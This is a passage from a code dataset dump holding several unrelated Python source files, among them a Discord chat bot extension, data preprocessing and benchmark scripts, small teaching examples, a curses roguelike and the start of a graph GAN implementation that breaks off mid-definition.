wants to talk to you**')\n                await self.client.message_create(message.channel, content=message.author.mention, embed=embed)\n                self.chat_grabbers.remove(chat_grabber)\n                return\n\n    async def close_chat(self, message):\n        try:\n            chat_grabber = next(c for c in self.chat_grabbers if message.channel in (c.origin, c.destination))\n        except StopIteration:\n            await self.client.message_create(message.channel, 'This channel isn\\'t chatting')\n            return\n        if message.author in chat_grabber.cancellation_votes:\n            await self.client.message_create(message.channel, 'You\\'ve already voted to close this chat.')\n            return\n        users = list(filter((lambda key: time() - chat_grabber.users[key]['time'] < 30), chat_grabber.users))\n        if message.author.id not in users:\n            return\n        elif len(chat_grabber.cancellation_votes) >= len(users) - 1:\n            await chat_grabber.stop()\n            self.chat_grabbers.remove(chat_grabber)\n        else:\n            chat_grabber.cancellation_votes.append(message.author)\n            await self.client.message_create(message.channel, '{}/{} votes required to close this chat.'.format(len(chat_grabber.cancellation_votes), len(users)))\n\n    @extension.command\n    async def chat(self, client, message, arg=None):\n        if arg is None:\n            await 
self.create_chat(message)\n        elif arg.lower() == 'close':\n            await self.close_chat(message)\n","repo_name":"Tortoise-Community/hata-code-jam","sub_path":"team-cinnamon/bot/extensions/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"14059288406","text":"import json\n\nimport requests\nfrom random import random, randrange, choice, randint\nfrom string import ascii_letters\n\nimport Sale\nfrom Product import State, Supplier\nfrom Sale import Payment\n\nsuppliers = ['pla', 'sud', 'riv', 'vyr', None]\nlocalhost = 'http://127.0.0.1:8000/'\n\n\ndef random_string():\n    string = ''\n    for a in range(randrange(3, 40)):\n        string += choice(ascii_letters + ' ')\n    return string\n\n\ndef random_products(qty=1):\n    items = []\n    for i in range(qty):\n        item = {'title': random_string(), 'state': choice(list(State)), 'price': randrange(1000, 15000, 50)}\n        if item['state'] == 'new':\n            item['supplier'] = choice(list(Supplier))\n        items.append(item)\n    return items\n\n\ndef random_sales(qty=1):\n    sales = []\n    for i in range(qty):\n        sale = {'products': random_products(randint(1, 8)), 'client_id': randint(1000000, 45000000),\n                'payment_method': choice(list(Payment)), 'email': 'whatever@whatever.com'}\n        sales.append(sale)\n    return sales\n\n\ndef post_sales(sales: list[Sale.Sale], url=localhost):\n    results = []\n    for i in sales:\n        r = requests.post(url + 'new_sale/', json.dumps(i))\n        results.append(r)\n    return results\n\n\n","repo_name":"messina8/FacturApi","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"13850331801","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# CSS class defining a thread.\nTHREAD_CLASS = \"topic\"  # type: str\n\n# CSS class defining a title inside a thread.\nTITLE_CLASS = \"bbp-topic-permalink\"  # type: str\n\n# Path to the csv file listing all thread titles using Korean characters.\nEXISTING_KOREAN_THREADS = \"/FULL/PATH/HERE\"\n\n# Path to a local HTML file for tests.\nTEST_HTML_FILE = \"/FULL/PATH/HERE\"\n\n# Path to the log file.\nLOGFILE = \"/FULL/PATH/HERE\"\n","repo_name":"saintsaens/fl-bb-stalker","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"28906417920","text":"import argparse\nimport os\nimport pickle\n\nimport pandas as pd\nfrom sklearn.feature_extraction import DictVectorizer\n\n\ndef read_dataframe(filename: str):\n    df = pd.read_parquet(filename)\n\n    df['duration'] = df.lpep_dropoff_datetime - df.lpep_pickup_datetime\n    df.duration = df.duration.apply(lambda td: td.total_seconds() / 60)\n    df = df[(df.duration >= 1) & (df.duration <= 68)]\n\n    categorical = ['PULocationID', 'DOLocationID']\n    df[categorical] = df[categorical].astype(str)\n\n    return df\n\n\n\ndef dump_pickle(obj, filename):\n    with open(filename, \"wb\") as fp:\n        return pickle.dump(obj, fp)\n\n\n\ndef preprocess(df: pd.DataFrame, dv: DictVectorizer, fit_dv: bool=False):\n    df['PU_DO'] = df['PULocationID'] + '_' + df['DOLocationID']\n    categorical = ['PU_DO']\n    numerical = ['trip_distance']\n    dicts = df[categorical + numerical].to_dict(orient='records')\n\n    if fit_dv:\n        X = dv.fit_transform(dicts)\n    else:\n        X = dv.transform(dicts)\n\n    return X, dv\n\n\ndef run(raw_data_path: str, 
dest_path: str, dataset: str=\"green\"):\n    df_train = read_dataframe(\n        os.path.join(raw_data_path, f\"{dataset}_tripdata_2022-01.parquet\"))\n\n    df_valid = read_dataframe(\n        os.path.join(raw_data_path, f\"{dataset}_tripdata_2022-02.parquet\"))\n\n    df_test = read_dataframe(\n        os.path.join(raw_data_path, f\"{dataset}_tripdata_2022-03.parquet\"))\n\n    target = 'duration'\n    y_train = df_train[target].values\n    y_valid = df_valid[target].values\n    y_test = df_test[target].values\n\n    dv = DictVectorizer()\n    X_train, dv = preprocess(df_train, dv, fit_dv=True)\n    X_valid, _ = preprocess(df_valid, dv, fit_dv=False)\n    X_test, _ = preprocess(df_test, dv, fit_dv=False)\n\n    os.makedirs(dest_path, exist_ok=True)\n\n    dump_pickle(dv, os.path.join(dest_path, \"dv.pkl\"))\n    dump_pickle((X_train, y_train), os.path.join(dest_path, \"train.pkl\"))\n    dump_pickle((X_valid, y_valid), os.path.join(dest_path, \"valid.pkl\"))\n    dump_pickle((X_test, y_test), os.path.join(dest_path, \"test.pkl\"))\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"--raw_data_path\",\n        help=\"Location of your raw data in .parquet format\"\n    )\n\n    parser.add_argument(\n        \"--dest_path\",\n        help=\"where you want to save your processed data.\"\n    )\n\n    args = parser.parse_args()\n\n    run(args.raw_data_path, args.dest_path)","repo_name":"alokpadhi/NYC-Trip-Duration","sub_path":"src/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"35981088142","text":"import openpyxl\n\npath = \"C:\\Prashanti M\\data1.xlsx\"\nworkbook=openpyxl.load_workbook(path)\n#sheet = workbook.get_sheet_by_name(\"Sheet1\")\nsheet = workbook.active\nrows=sheet.max_row\ncols=sheet.max_column\n\nprint(rows)\nprint(cols)\n\nfor r in range(1,rows+1):  #range excludes the end value, so we add 1\n    for c in range(1,cols+1):\n        print(sheet.cell(row=r,column=c).value)","repo_name":"Prashanti770/selepract2","sub_path":"selepract1-main/ReadExcel.py","file_name":"ReadExcel.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"72481699272","text":"# Dictionary\r\n\r\ndaily_temps_dict = {'sun':71.1, 'mon':71.5, 'tues':80.2, 'wed':79.2, 'thur':75.6, 'fri':75.2, 'sat':81.4}\r\n\r\nprint(\"This program displays the avg temperature for a given day\")\r\n\r\nterminate = False\r\nwhile not terminate:\r\n\r\n    day = input(\"Enter 'sun', 'mon', 'tues', 'wed', 'thur', 'fri', or 'sat': \")\r\n\r\n    if day in daily_temps_dict:\r\n        print(\"The temperature for {} is {}\".format(day, daily_temps_dict[day]))\r\n    else:\r\n        print(\"Invalid input\")\r\n\r\n    t = input(\"Do you want to continue? 
(y/n) \")\r\n if t in 'Nn':\r\n terminate = True\r\n","repo_name":"bjf5201/python-snippets","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11337323033","text":"#!/usr/bin/env python3\n# # -*- coding: UTF-8 -*-\"\n# ------------------------------------------------\n# Creation Date: 11-02-2017\n# Last Change: ter 29 nov 2016 09:21:52 BRT\n# this script aims: show files and dirs recursively\n# author: sergio luiz araujo silva\n# site: http://vivaotux.blogspot.com\n# twitter: @voyeg3r\n# ------------------------------------------------\n# Obs: to rename files we have to use --> topdown=False\n\n\nimport os\n\n\nsearch_folder = '.'\n\nfor root, dirs, files in os.walk(search_folder):\n print(f'Diretório: {root}')\n for file in files:\n fullfilepath = os.path.join(root, file)\n filesize = os.path.getsize(fullfilepath)\n print(f'{fullfilepath} bites: {filesize}')\n print()\n","repo_name":"voyeg3r/dotfiles","sub_path":"bin/showtree.py","file_name":"showtree.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"5865013095","text":"import urllib.parse\nfrom itertools import groupby\n\nfrom Reuse import dynatrace_api\nfrom Reuse import environment\nfrom Reuse import report_writer\n\n\ndef get_tag_data(env, token):\n endpoint = '/api/config/v1/autoTags'\n raw_params = 'fields=+description'\n params = urllib.parse.quote(raw_params, safe='/,&=')\n auto_tags_json_list = dynatrace_api.get(env, token, endpoint, params)\n\n tag_data_list = []\n\n for auto_tags_json in auto_tags_json_list:\n inner_auto_tags_json_list = auto_tags_json.get('values')\n for inner_auto_tags_json in inner_auto_tags_json_list:\n name = inner_auto_tags_json.get('name')\n description = inner_auto_tags_json.get('description', '')\n tag_data_list.append((name, description))\n\n return tag_data_list\n\n\ndef process(env_name_list, all_env_name_data):\n rows = []\n\n for key in sorted(all_env_name_data.keys()):\n autotag_data = all_env_name_data.get(key)\n autotag_name = key\n autotag_env_name_list = autotag_data.get('env_name_list')\n autotag_description_list = autotag_data.get('description_list')\n if all_equal(autotag_description_list):\n autotag_description = autotag_description_list[0]\n else:\n autotag_description = str(autotag_description_list)\n finding = ''\n if autotag_env_name_list != env_name_list or not all_equal(autotag_description_list):\n if autotag_env_name_list != env_name_list:\n finding = 'Not defined in all environments'\n else:\n finding = 'Not defined identically in all environments'\n\n rows.append((autotag_name, autotag_description, report_writer.stringify_list(autotag_env_name_list), finding))\n\n report_name = 'Auto Tag Summary'\n report_writer.initialize_text_file(None)\n report_headers = ('Auto Tag Name', 'Description', 'Environments', 'Finding')\n report_writer.write_console(report_name, report_headers, rows, delimiter='|')\n report_writer.write_text(None, report_name, report_headers, rows, delimiter='|')\n report_writer.write_xlsx(None, report_name, report_headers, rows, header_format=None, auto_filter=None)\n report_writer.write_html(None, report_name, report_headers, rows)\n\n\ndef add_or_update(env_name, env_name_data, all_env_name_data):\n env_name_data_current = all_env_name_data.get(env_name_data[0])\n if env_name_data_current:\n env_name_list = 
env_name_data_current.get('env_name_list')\n description_list = env_name_data_current.get('description_list')\n env_name_list.append(env_name)\n description_list.append(env_name_data[1])\n all_env_name_data[env_name_data[0]] = {'env_name_list': env_name_list, 'description_list': description_list}\n else:\n all_env_name_data[env_name_data[0]] = {'env_name_list': [env_name], 'description_list': [env_name_data[1]]}\n\n\ndef all_equal(iterable):\n g = groupby(iterable)\n return next(g, True) and not next(g, False)\n\n\ndef main():\n env_name_list = ['Prod', 'NonProd']\n\n all_env_name_data = {}\n\n for env_name in env_name_list:\n env_name, env, token = environment.get_environment(env_name)\n env_name_data_list = get_tag_data(env, token)\n for env_name_data in env_name_data_list:\n add_or_update(env_name, env_name_data, all_env_name_data)\n\n process(env_name_list, all_env_name_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Dynatrace-Dave-Mauney/Automation","sub_path":"Reporting/Tags/report_autotag_summary.py","file_name":"report_autotag_summary.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"4204882106","text":"# Implement dynamic arrays, similar to Java's ArrayList. By default, python\n# lists are dynamic arrays, so just try to simulate static arrays in python\n\nclass DynamicArray:\n \n CAPACITY_INC_SIZE = 2\n \n def __init__(self, size):\n self.dynamic_array = [None] * size\n self.index = 0\n\n def append(self, item):\n if self.dynamic_array[-1] != None:\n self.inc_size_and_copy_array()\n\n self.dynamic_array[self.index] = item\n self.index += 1\n\n def get(self, index):\n if index <= self.index - 1:\n return self.dynamic_array[index]\n else:\n return 'Error: index doesn''t exist'\n\n def len(self):\n return self.index\n\n def size(self):\n return len(self.dynamic_array)\n\n def inc_size_and_copy_array(self):\n temp = [None] * (len(self.dynamic_array) * self.CAPACITY_INC_SIZE)\n for idx, item in enumerate(self.dynamic_array):\n temp[idx] = item\n self.dynamic_array = temp \n\n def __str__(self):\n return \" \".join(str(self.dynamic_array[:self.index]))\n\nda = DynamicArray(2)\nda.append(10)\nda.append(20)\nda.append(30)\nprint(da)\nprint('Array Length: ', da.len())\nprint('Array Size:', da.size())\nda.append(40)\nda.append(50)\nprint('Array Length: ', da.len())\nprint('Array Size: ', da.size())\nprint(da)\nprint(da.get(0))\nprint(da.get(9))\nprint(da.get(4))","repo_name":"mkvenkatesh/Random-Programming-Exercises","sub_path":"dynamic_array_implementation.py","file_name":"dynamic_array_implementation.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7680862442","text":"import curses\nimport random\nimport gspread\nfrom inventoryManager import *\nfrom mapManager import *\nfrom actionManager import *\nfrom skillManager import *\nfrom screenManager import *\nfrom questManager import *\nfrom statManager import *\nfrom helpManager import *\nfrom debugManager import *\n\n#test\n\ndef main(screen):\n curses.start_color()\n curses.use_default_colors()\n for i in range(0, curses.COLORS):\n curses.init_pair(i + 1, i, -1)\n curses.curs_set(0)\n screen.nodelay(True)\n screen.clear()\n screenSizeY, screenSizeX = screen.getmaxyx()\n mapSizeX = 300\n mapSizeY = 300\n inventoryPosY = mapSizeY + int(mapSizeY/10)\n descriptionBoxX = mapSizeX + int(mapSizeX/10)\n skillManagerDisplayX 
= descriptionBoxX\n skillManagerDisplayY = inventoryPosY\n playerPosX = int(mapSizeX/2)\n playerPosY = int(mapSizeY/2)\n ax = 0\n ay = 0\n currentMap, monsters, towns = mapGenerate(mapSizeX, mapSizeY)\n modulePositions = ['map','actions','inventory','skills', 'quests', 'stats', 'help', 'debug']\n inventory = ['axe', 'shovel', 'bucket']\n skills = {}\n prayerPoints = 0\n playerMoveDirection = ('x','y')\n #quest tuple is (,,,,)\n activeQuests = []\n shop = {'logs':2}\n actionDescriptions = {'grass':((\"Press 'p' to plant seed\"), 16), \n 'tree':((\"Press 'c' to chop down tree\"), 3),\n 'town':((\"Press 'e' to enter town\"), 14), \n 'shop':((\"Press 's' to enter shop\"), 15),\n 'monster':((\"Press 'a' to attack monster\"), 5), \n 'water':((\"Press 'f' to fish the water\"), 2),\n 'fire':((\"Press 'f' to start fire\"), 13), \n 'mountain':((\"Press 'e' to explore mountain\"), 16),\n 'mine':((\"Press 'm' to mine ore\"), 7), \n 'craftShop':((\"Press 'c' to enter shop\"), 4),\n 'quest':((\"Press 'e' to complete quest\"), 15), \n 'alter':((\"Press 'p' to pray\"), 2),\n }\n # Stats are in order, health, mana, attack, defense, speed, left wield, right wield, head, neck, torso, left arm, right arm, legs, feet, pet\n playerStats = [100, 100, 100, 100, 10, 1, 1, 11, 1, 12, 1, 1, 35, 14, 20]\n textToDisplay = [(\"Test\",13),(\"another test!\",5)]\n armourUpdated = True\n\n while True:\n keyPressed = keyboardManager(screen)\n screen.clear()\n screenBorders(screen)\n helpManagerDisplay(screen, modulePositions.index('help'))\n mapDraw(screen, currentMap, playerPosX, playerPosY, mapSizeX, mapSizeY, modulePositions.index('map'))\n skillManagerDisplay(screen, skills, modulePositions.index('skills'))\n inventoryManager(inventory, screen, inventoryPosY, modulePositions.index('inventory'))\n questManagerDisplay(screen, activeQuests, modulePositions.index('quests'))\n statManagerDisplay(screen, modulePositions.index('stats'), playerStats, armourUpdated)\n actionManagerDisplay(screen, modulePositions.index('actions'), textToDisplay, currentMap, mapSizeX, mapSizeY, playerPosX, playerPosY, monsters)\n currentMap, inventory, skills, activeQuests, modulePositions, textToDisplay, prayerPoints, playerMoveDirection = actionManagerKey(currentMap, playerPosX, playerPosY, inventory, skills, screen, activeQuests, modulePositions, textToDisplay, prayerPoints, keyPressed)\n if not playerMoveDirection[0] == 'x' and not playerMoveDirection[1] == 'y':\n playerPosX, playerPosY = playerMovementManager(currentMap, playerPosX, playerPosY, playerMoveDirection)\n currentMap = mapEvents(currentMap, playerPosX, playerPosY, monsters)\n\n armourUpdated = False\n #debugManagerDisplay(screen, modulePositions.index('debug'))\n\n\nif __name__ == '__main__':\n screenSetup()\n curses.wrapper(main)\n","repo_name":"LachlanB96/rogueLike","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"11493838099","text":"from tkinter import *\n\nMILE_TO_KM= 1.609\n\ndef miles_to_km():\n '''Display te miles in km'''\n _miles = float(miles.get())\n _km = _miles * MILE_TO_KM\n converted_label.config(text=round(_km,2))\n\n#400 x 250 pixel window \nwindow = Tk()\nwindow.title(\"Miles to Km Converter\")\nwindow.minsize(300, 120)\nwindow.config(padx=20, pady=20)\n\n#Static labels\nlabel = Label(text=\"is equal to\", font=(\"Arial\", 12, \"bold\"))\nlabel.grid(column=0, row=1)\nlabel.config(padx=10)\n\nmiles_label = 
Label(text=\"Miles\", font=(\"Arial\", 12, \"bold\"))\nmiles_label.grid(column=2, row=0)\nmiles_label.config(padx=10)\n\nkm_lablel = Label(text=\"Km\", font=(\"Arial\", 12, \"bold\"))\nkm_lablel.config(padx=10)\nkm_lablel.grid(column=2, row=1)\n\n#Miles entry box\nmiles = Entry(width=10)\nmiles.grid(column=1, row=0)\n\n#Dinamic convert label\nconverted_label = Label(text=\"0\", font=(\"Arial\", 12, \"bold\"))\nconverted_label.grid(column=1,row=1)\n\n#Calculate button\nconvert_button = Button(text=\"Calculate\", font=(\"Arial\", 12, \"bold\"),command=miles_to_km)\nconvert_button.grid(column=1, row=2)\n\nwindow.mainloop()","repo_name":"alvarohqr/My-100-Days-of-Code-Python","sub_path":"Day 27/miles_to_km.py","file_name":"miles_to_km.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16745175211","text":"from BST_tree import BinarySearchTree\nfrom AVL_tree import AVL_tree\nimport time\nimport random\nimport cProfile\n\ndef run_profiler():\n N = 10000000\n\n data_bst = random.sample(range(1, 10000001), N)\n data_avl = data_bst.copy()\n\n bst = BinarySearchTree()\n avl = AVL_tree()\n\n #inserts\n start_time = time.time()\n\n for data in data_bst:\n bst.insert(data)\n bst_insert_time = time.time() - start_time\n print(\"BST nodes: \", bst.count_nodes())\n\n start_time = time.time()\n\n for data in data_avl:\n avl.insert(data)\n avl_insert_time = time.time() - start_time\n print(\"AVL nodes: \", avl.count_nodes())\n\n #search\n\n search_numbers = random.sample(range(1, N+1), 1000)\n\n start_time = time.time()\n\n for number in search_numbers:\n bst.search(number)\n bst_search_time = time.time() - start_time\n\n start_time = time.time()\n\n for number in search_numbers:\n avl.search(number)\n avl_search_time = time.time() - start_time\n\n print(\"BST insert time: \", bst_insert_time)\n print(\"AVL insert time: \", avl_insert_time)\n print(\"BST search time: \", bst_search_time)\n print(\"AVL search time: \", avl_search_time)\n\ncProfile.run('run_profiler()', sort='tottime')","repo_name":"Christ02/parcial_2","sub_path":"2) BST vs AVL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"754615656","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 12 14:11:48 2018\r\nThe program is based on https://github.com/nfmcclure/tensorflow_cookbook\r\n\"\"\"\r\n\r\nfrom tensorflow.python.framework import ops\r\nops.reset_default_graph()\r\n\r\n# Housing Price Data\r\nfrom keras.datasets import boston_housing\r\n(x_train, y_train), (x_test, y_test) = boston_housing.load_data()\r\nhousing_header = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV']\r\nprint(x_train.shape[0])\r\nprint(x_train.shape[1])\r\n","repo_name":"JunzuoWan/DeepLearning_MachineLearning","sub_path":"Collecting_Data_HousingPriceDataset.py","file_name":"Collecting_Data_HousingPriceDataset.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71604800072","text":"\"\"\"Main function of gGAN for the paper: Foreseeing Brain Graph Evolution Over Time\r\nUsing Deep Adversarial Network Normalizer\r\n Details can be found in: (there will be a paper link here)\r\n (1) the original paper .\r\n 
---------------------------------------------------------------------\r\n This file contains the implementation of two key steps of our gGAN framework:\r\n netNorm(v, nbr_of_sub, nbr_of_regions)\r\n Inputs:\r\n v: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n Output:\r\n CBT: (t x t) matrix representing the connectional brain template\r\n\r\n gGAN(sourceGraph, nbr_of_regions, nbr_of_folds, nbr_of_epochs, hyper_param1, CBT)\r\n Inputs:\r\n sourceGraph: (n × t x t) matrix stacking the source graphs of all subjects\r\n n the total number of subjects\r\n t number of regions\r\n CBT: (t x t) matrix stacking the connectional brain template generated by netNorm\r\n\r\n Output:\r\n translatedGraph: (t x t) matrix stacking the graph translated into CBT\r\n\r\n (2) Dependencies: please install the following libraries:\r\n - matplotlib\r\n - numpy\r\n - scikitlearn\r\n - pytorch\r\n - pytorch-geometric\r\n - pytorch-scatter\r\n - pytorch-sparse\r\n - scipy\r\n\r\n ---------------------------------------------------------------------\r\n Copyright 2020 ().\r\n Please cite the above paper if you use this code.\r\n All rights reserved.\r\n \"\"\"\r\n\r\n\r\n# If you are using Google Colab please uncomment the three following lines.\r\n# !pip install torch_geometric\r\n# !pip install torch-sparse==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n# !pip install torch-scatter==latest+cu101 -f https://pytorch-geometric.com/whl/torch-1.4.0.html\r\n\r\n\r\nimport argparse\r\nimport pickle\r\nimport os\r\nimport pdb\r\nimport numpy as np\r\nimport math\r\nimport itertools\r\nimport torch\r\nfrom torch.nn import Sequential, Linear, ReLU, Sigmoid, Tanh, Dropout\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom torch_geometric.data import Data\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch_geometric.nn import NNConv, GCNConv\r\nfrom torch_geometric.nn import BatchNorm, EdgePooling, TopKPooling, global_add_pool\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.stats as stats\r\nimport seaborn as sns\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda')\r\n print('running on GPU')\r\n # if you are using GPU\r\n torch.cuda.manual_seed(0)\r\n torch.cuda.manual_seed_all(0)\r\n\r\n torch.backends.cudnn.enabled = False\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n print('running on CPU')\r\n\r\nnbr_of_regions = 35\r\n\r\n\r\ndef set_num_regions(num_regions):\r\n global nbr_of_regions\r\n nbr_of_regions = num_regions\r\n\r\n\r\ndef netNorm(v, nbr_of_sub):\r\n nbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\n\r\n def upper_triangular():\r\n All_subj = np.zeros((nbr_of_sub, nbr_of_feat))\r\n for j in range(nbr_of_sub):\r\n subj_x = v[j, :, :]\r\n subj_x = np.reshape(subj_x, (nbr_of_regions, nbr_of_regions))\r\n subj_x = subj_x[np.triu_indices(nbr_of_regions, k=1)]\r\n subj_x = np.reshape(subj_x, (1, nbr_of_feat))\r\n All_subj[j, :] = subj_x\r\n\r\n return All_subj\r\n\r\n def distances_inter(All_subj):\r\n theta = 0\r\n distance_vector = np.zeros(1)\r\n distance_vector_final = np.zeros(1)\r\n x = All_subj\r\n for i in range(nbr_of_feat):\r\n ROI_i = x[:, i]\r\n for j in 
range(nbr_of_sub):\r\n subj_j = ROI_i[j:j + 1]\r\n\r\n distance_euclidienne_sub_j_sub_k = 0\r\n for k in range(nbr_of_sub):\r\n if k != j:\r\n subj_k = ROI_i[k:k + 1]\r\n\r\n distance_euclidienne_sub_j_sub_k = distance_euclidienne_sub_j_sub_k + np.square(\r\n subj_k - subj_j)\r\n theta += 1\r\n if j == 0:\r\n distance_vector = np.sqrt(distance_euclidienne_sub_j_sub_k)\r\n else:\r\n distance_vector = np.concatenate((distance_vector, np.sqrt(distance_euclidienne_sub_j_sub_k)),\r\n axis=0)\r\n\r\n distance_vector = np.reshape(distance_vector, (nbr_of_sub, 1))\r\n if i == 0:\r\n distance_vector_final = distance_vector\r\n else:\r\n distance_vector_final = np.concatenate((distance_vector_final, distance_vector), axis=1)\r\n\r\n print(theta)\r\n return distance_vector_final\r\n\r\n def minimum_distances(distance_vector_final):\r\n x = distance_vector_final\r\n\r\n for i in range(nbr_of_feat):\r\n minimum_sub = x[0, i:i + 1]\r\n minimum_sub = float(minimum_sub)\r\n general_minimum = 0\r\n general_minimum = np.array(general_minimum)\r\n for k in range(1, nbr_of_sub):\r\n local_sub = x[k:k + 1, i:i + 1]\r\n local_sub = float(local_sub)\r\n if local_sub < minimum_sub:\r\n general_minimum = k\r\n general_minimum = np.array(general_minimum)\r\n minimum_sub = local_sub\r\n if i == 0:\r\n final_general_minimum = np.array(general_minimum)\r\n else:\r\n final_general_minimum = np.vstack((final_general_minimum, general_minimum))\r\n\r\n final_general_minimum = np.transpose(final_general_minimum)\r\n\r\n return final_general_minimum\r\n\r\n def new_tensor(final_general_minimum, All_subj):\r\n y = All_subj\r\n x = final_general_minimum\r\n for i in range(nbr_of_feat):\r\n optimal_subj = x[:, i:i + 1]\r\n optimal_subj = np.reshape(optimal_subj, (1))\r\n optimal_subj = int(optimal_subj)\r\n if i == 0:\r\n final_new_tensor = y[optimal_subj: optimal_subj + 1, i:i + 1]\r\n else:\r\n final_new_tensor = np.concatenate((final_new_tensor, y[optimal_subj: optimal_subj + 1, i:i + 1]),\r\n axis=1)\r\n\r\n return final_new_tensor\r\n\r\n def make_sym_matrix(nbr_of_regions, feature_vector):\r\n my_matrix = np.zeros([nbr_of_regions, nbr_of_regions], dtype=np.double)\r\n\r\n my_matrix[np.triu_indices(nbr_of_regions, k=1)] = feature_vector\r\n my_matrix = my_matrix + my_matrix.T\r\n my_matrix[np.diag_indices(nbr_of_regions)] = 0\r\n\r\n return my_matrix\r\n\r\n def re_make_tensor(final_new_tensor, nbr_of_regions):\r\n x = final_new_tensor\r\n # x = np.reshape(x, (nbr_of_views, nbr_of_feat))\r\n\r\n x = make_sym_matrix(nbr_of_regions, x)\r\n x = np.reshape(x, (1, nbr_of_regions, nbr_of_regions))\r\n\r\n return x\r\n\r\n Upp_trig = upper_triangular()\r\n Dis_int = distances_inter(Upp_trig)\r\n Min_dis = minimum_distances(Dis_int)\r\n New_ten = new_tensor(Min_dis, Upp_trig)\r\n Re_ten = re_make_tensor(New_ten, nbr_of_regions)\r\n Re_ten = np.reshape(Re_ten, (nbr_of_regions, nbr_of_regions))\r\n np.fill_diagonal(Re_ten, 0)\r\n network = np.array(Re_ten)\r\n return network\r\n\r\ndef cast_data(array_of_tensors, version):\r\n version1 = torch.tensor(version, dtype=torch.int)\r\n\r\n N_ROI = array_of_tensors[0].shape[0]\r\n CHANNELS = 1\r\n dataset = []\r\n edge_index = torch.zeros(2, N_ROI * N_ROI)\r\n edge_attr = torch.zeros(N_ROI * N_ROI, CHANNELS)\r\n x = torch.zeros((N_ROI, N_ROI)) # 35 x 35\r\n y = torch.zeros((1,))\r\n\r\n counter = 0\r\n for i in range(N_ROI):\r\n for j in range(N_ROI):\r\n edge_index[:, counter] = torch.tensor([i, j])\r\n counter += 1\r\n for mat in array_of_tensors: # 1,35,35,4\r\n\r\n if version1 == 
0:\r\n edge_attr = mat.view((nbr_of_regions * nbr_of_regions), 1)\r\n x = mat.view(nbr_of_regions, nbr_of_regions)\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n elif version1 == 1:\r\n edge_attr = torch.randn(N_ROI * N_ROI, CHANNELS)\r\n x = torch.randn(N_ROI, N_ROI) # 35 x 35\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n return dataset\r\n\r\n# ------------------------------------------------------------\r\n\r\ndef plotting_loss(losses_generator, losses_discriminator, epoch):\r\n plt.figure(1)\r\n plt.plot(epoch, losses_generator, 'r-')\r\n plt.plot(epoch, losses_discriminator, 'b-')\r\n plt.legend(['G Loss', 'D Loss'])\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Loss')\r\n plt.savefig('./plot/loss' + str(epoch) + '.png')\r\n\r\n# -------------------------------------------------------------\r\n\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n\r\n nn = Sequential(Linear(1, (nbr_of_regions * nbr_of_regions)), ReLU())\r\n self.conv1 = 